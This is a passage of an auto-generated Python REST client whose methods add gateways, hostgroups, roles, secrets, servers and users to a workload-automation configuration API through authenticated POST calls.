>>> result = thread.get()
:param async_req bool
:param GatewayData body: gateway data (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_gateway" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_gateway`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/gateway', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_host_to_hostgroup(self, body, server, hostgroup, **kwargs): # noqa: E501
"""add agent to hostgroup # noqa: E501
Add an agent to hostgroup. Create the the hostgroup if it does not exist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_host_to_hostgroup(body, server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AgentInHostgroup body: The hostname of the new agent (required)
:param str server: The Server the hostgroup belongs to. (required)
:param str hostgroup: The hostgroup name (required)
:return: AgentsInGroupSuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_host_to_hostgroup_with_http_info(body, server, hostgroup, **kwargs) # noqa: E501
else:
(data) = self.add_host_to_hostgroup_with_http_info(body, server, hostgroup, **kwargs) # noqa: E501
return data
def add_host_to_hostgroup_with_http_info(self, body, server, hostgroup, **kwargs): # noqa: E501
"""add agent to hostgroup # noqa: E501
Add an agent to hostgroup. Create the the hostgroup if it does not exist. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_host_to_hostgroup_with_http_info(body, server, hostgroup, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AgentInHostgroup body: The hostname of the new agent (required)
:param str server: The Server the hostgroup belongs to. (required)
:param str hostgroup: The hostgroup name (required)
:return: AgentsInGroupSuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'hostgroup'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_host_to_hostgroup" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_host_to_hostgroup`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `add_host_to_hostgroup`") # noqa: E501
# verify the required parameter 'hostgroup' is set
if ('hostgroup' not in params or
params['hostgroup'] is None):
raise ValueError("Missing the required parameter `hostgroup` when calling `add_host_to_hostgroup`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'hostgroup' in params:
path_params['hostgroup'] = params['hostgroup'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/hostgroup/{hostgroup}/agent', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='AgentsInGroupSuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_hub_to_cluster(self, agentname, **kwargs): # noqa: E501
"""add hub to cluster. # noqa: E501
add hub to cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_hub_to_cluster(agentname, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str agentname: Agent name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_hub_to_cluster_with_http_info(agentname, **kwargs) # noqa: E501
else:
(data) = self.add_hub_to_cluster_with_http_info(agentname, **kwargs) # noqa: E501
return data
def add_hub_to_cluster_with_http_info(self, agentname, **kwargs): # noqa: E501
"""add hub to cluster. # noqa: E501
add hub to cluster. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_hub_to_cluster_with_http_info(agentname, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str agentname: Agent name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['agentname'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_hub_to_cluster" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'agentname' is set
if ('agentname' not in params or
params['agentname'] is None):
raise ValueError("Missing the required parameter `agentname` when calling `add_hub_to_cluster`") # noqa: E501
collection_formats = {}
path_params = {}
if 'agentname' in params:
path_params['agentname'] = params['agentname'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/cluster/hub/{agentname}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_mft_folder(self, body, **kwargs): # noqa: E501
"""Add virtual folder # noqa: E501
Add virtual folder # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_mft_folder(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FolderPropertiesData body: virtual folder data (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_mft_folder_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_mft_folder_with_http_info(body, **kwargs) # noqa: E501
return data
def add_mft_folder_with_http_info(self, body, **kwargs): # noqa: E501
"""Add virtual folder # noqa: E501
Add virtual folder # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_mft_folder_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param FolderPropertiesData body: virtual folder data (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_mft_folder" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_mft_folder`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/virtualfolder', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_mft_user_group(self, body, **kwargs): # noqa: E501
"""Add user group. # noqa: E501
Add user group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_mft_user_group(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UserGroupPropertiesData body: User group object properites (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_mft_user_group_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_mft_user_group_with_http_info(body, **kwargs) # noqa: E501
return data
def add_mft_user_group_with_http_info(self, body, **kwargs): # noqa: E501
"""Add user group. # noqa: E501
Add user group. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_mft_user_group_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param UserGroupPropertiesData body: User group object properites (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_mft_user_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_mft_user_group`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/mft/usergroup', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_pgp_template(self, body, server, agent, template_name, **kwargs): # noqa: E501
"""Add PGP Template # noqa: E501
Add PGP Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_pgp_template(body, server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PgpTemplateData body: PGP Template Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The PGP Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_pgp_template_with_http_info(body, server, agent, template_name, **kwargs) # noqa: E501
else:
(data) = self.add_pgp_template_with_http_info(body, server, agent, template_name, **kwargs) # noqa: E501
return data
def add_pgp_template_with_http_info(self, body, server, agent, template_name, **kwargs): # noqa: E501
"""Add PGP Template # noqa: E501
Add PGP Template # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_pgp_template_with_http_info(body, server, agent, template_name, async_req=True)
>>> result = thread.get()
:param async_req bool
:param PgpTemplateData body: PGP Template Data (required)
:param str server: The Server (required)
:param str agent: The Agent (required)
:param str template_name: The PGP Template Name (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body', 'server', 'agent', 'template_name'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_pgp_template" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_pgp_template`") # noqa: E501
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `add_pgp_template`") # noqa: E501
# verify the required parameter 'agent' is set
if ('agent' not in params or
params['agent'] is None):
raise ValueError("Missing the required parameter `agent` when calling `add_pgp_template`") # noqa: E501
# verify the required parameter 'template_name' is set
if ('template_name' not in params or
params['template_name'] is None):
raise ValueError("Missing the required parameter `template_name` when calling `add_pgp_template`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
if 'agent' in params:
path_params['agent'] = params['agent'] # noqa: E501
if 'template_name' in params:
path_params['templateName'] = params['template_name'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/agent/{agent}/mft/pgptemplate/{templateName}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_remote_host(self, server, **kwargs): # noqa: E501
"""add remote host to Server # noqa: E501
Add a remote host to Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_remote_host(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is going to be added to. (required)
:param AddRemoteHostParams body: The non default, advanced configuration data
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_remote_host_with_http_info(server, **kwargs) # noqa: E501
else:
(data) = self.add_remote_host_with_http_info(server, **kwargs) # noqa: E501
return data
def add_remote_host_with_http_info(self, server, **kwargs): # noqa: E501
"""add remote host to Server # noqa: E501
Add a remote host to Server. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_remote_host_with_http_info(server, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str server: The Server the remote host is going to be added to. (required)
:param AddRemoteHostParams body: The non default, advanced configuration data
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['server', 'body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_remote_host" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'server' is set
if ('server' not in params or
params['server'] is None):
raise ValueError("Missing the required parameter `server` when calling `add_remote_host`") # noqa: E501
collection_formats = {}
path_params = {}
if 'server' in params:
path_params['server'] = params['server'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server/{server}/remotehost', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_role(self, role_file, **kwargs): # noqa: E501
"""Add Authorization Role # noqa: E501
Add Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role(role_file, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role_file: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_role_with_http_info(role_file, **kwargs) # noqa: E501
else:
(data) = self.add_role_with_http_info(role_file, **kwargs) # noqa: E501
return data
def add_role_with_http_info(self, role_file, **kwargs): # noqa: E501
"""Add Authorization Role # noqa: E501
Add Authorization Role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role_with_http_info(role_file, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str role_file: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['role_file'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_role" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'role_file' is set
if ('role_file' not in params or
params['role_file'] is None):
raise ValueError("Missing the required parameter `role_file` when calling `add_role`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
if 'role_file' in params:
local_var_files['roleFile'] = params['role_file'] # noqa: E501
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['multipart/form-data']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/role', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_role_to_ldap_group(self, ldapgroup, role, **kwargs): # noqa: E501
"""Add a role to LDAP group # noqa: E501
Add a role to LDAP group so any user belong to the LDAP group will get all permissions defined in the role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role_to_ldap_group(ldapgroup, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ldapgroup: Name of LDAP group (required)
:param str role: Name of role (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_role_to_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501
else:
(data) = self.add_role_to_ldap_group_with_http_info(ldapgroup, role, **kwargs) # noqa: E501
return data
def add_role_to_ldap_group_with_http_info(self, ldapgroup, role, **kwargs): # noqa: E501
"""Add a role to LDAP group # noqa: E501
Add a role to LDAP group so any user belong to the LDAP group will get all permissions defined in the role # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role_to_ldap_group_with_http_info(ldapgroup, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str ldapgroup: Name of LDAP group (required)
:param str role: Name of role (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['ldapgroup', 'role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_role_to_ldap_group" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'ldapgroup' is set
if ('ldapgroup' not in params or
params['ldapgroup'] is None):
raise ValueError("Missing the required parameter `ldapgroup` when calling `add_role_to_ldap_group`") # noqa: E501
# verify the required parameter 'role' is set
if ('role' not in params or
params['role'] is None):
raise ValueError("Missing the required parameter `role` when calling `add_role_to_ldap_group`") # noqa: E501
collection_formats = {}
path_params = {}
if 'ldapgroup' in params:
path_params['ldapgroup'] = params['ldapgroup'] # noqa: E501
if 'role' in params:
path_params['role'] = params['role'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/ldap/{ldapgroup}/role/{role}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_role_to_user(self, user, role, **kwargs): # noqa: E501
"""Add a role to user # noqa: E501
Add a role to user so that user will inherit role authorization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role_to_user(user, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: Name of user (required)
:param str role: Name of role (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_role_to_user_with_http_info(user, role, **kwargs) # noqa: E501
else:
(data) = self.add_role_to_user_with_http_info(user, role, **kwargs) # noqa: E501
return data
def add_role_to_user_with_http_info(self, user, role, **kwargs): # noqa: E501
"""Add a role to user # noqa: E501
Add a role to user so that user will inherit role authorization # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_role_to_user_with_http_info(user, role, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user: Name of user (required)
:param str role: Name of role (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['user', 'role'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_role_to_user" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'user' is set
if ('user' not in params or
params['user'] is None):
raise ValueError("Missing the required parameter `user` when calling `add_role_to_user`") # noqa: E501
# verify the required parameter 'role' is set
if ('role' not in params or
params['role'] is None):
raise ValueError("Missing the required parameter `role` when calling `add_role_to_user`") # noqa: E501
collection_formats = {}
path_params = {}
if 'user' in params:
path_params['user'] = params['user'] # noqa: E501
if 'role' in params:
path_params['role'] = params['role'] # noqa: E501
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/authorization/user/{user}/role/{role}', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_secret(self, body, **kwargs): # noqa: E501
"""Add a new secret # noqa: E501
Add a new secret to the secrets vault. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_secret(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SecretKeyValue body: The new secret value (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_secret_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_secret_with_http_info(body, **kwargs) # noqa: E501
return data
def add_secret_with_http_info(self, body, **kwargs): # noqa: E501
"""Add a new secret # noqa: E501
Add a new secret to the secrets vault. # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_secret_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param SecretKeyValue body: The new secret value (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_secret" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_secret`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/secret', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_server(self, body, **kwargs): # noqa: E501
"""add server to the system # noqa: E501
Add a Server. This command setting up new server in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_server(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AddServerParams body: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('async_req'):
return self.add_server_with_http_info(body, **kwargs) # noqa: E501
else:
(data) = self.add_server_with_http_info(body, **kwargs) # noqa: E501
return data
def add_server_with_http_info(self, body, **kwargs): # noqa: E501
"""add server to the system # noqa: E501
Add a Server. This command setting up new server in the system # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_server_with_http_info(body, async_req=True)
>>> result = thread.get()
:param async_req bool
:param AddServerParams body: (required)
:return: SuccessData
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['body'] # noqa: E501
all_params.append('async_req')
all_params.append('_return_http_data_only')
all_params.append('_preload_content')
all_params.append('_request_timeout')
params = locals()
for key, val in six.iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method add_server" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'body' is set
if ('body' not in params or
params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `add_server`") # noqa: E501
collection_formats = {}
path_params = {}
query_params = []
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.select_header_accept(
['application/json']) # noqa: E501
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.select_header_content_type( # noqa: E501
['*/*']) # noqa: E501
# Authentication setting
auth_settings = ['Bearer'] # noqa: E501
return self.api_client.call_api(
'/config/server', 'POST',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='SuccessData', # noqa: E501
auth_settings=auth_settings,
async_req=params.get('async_req'),
_return_http_data_only=params.get('_return_http_data_only'),
_preload_content=params.get('_preload_content', True),
_request_timeout=params.get('_request_timeout'),
collection_formats=collection_formats)
def add_user(self, user_file, **kwargs): # noqa: E501
"""Add user # noqa: E501
Add user # noqa: E501
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please pass async_req=True
>>> thread = api.add_user(user_file, async_req=True)
>>> result = thread.get()
:param async_req bool
:param str user_file: (required)
:return: SuccessData
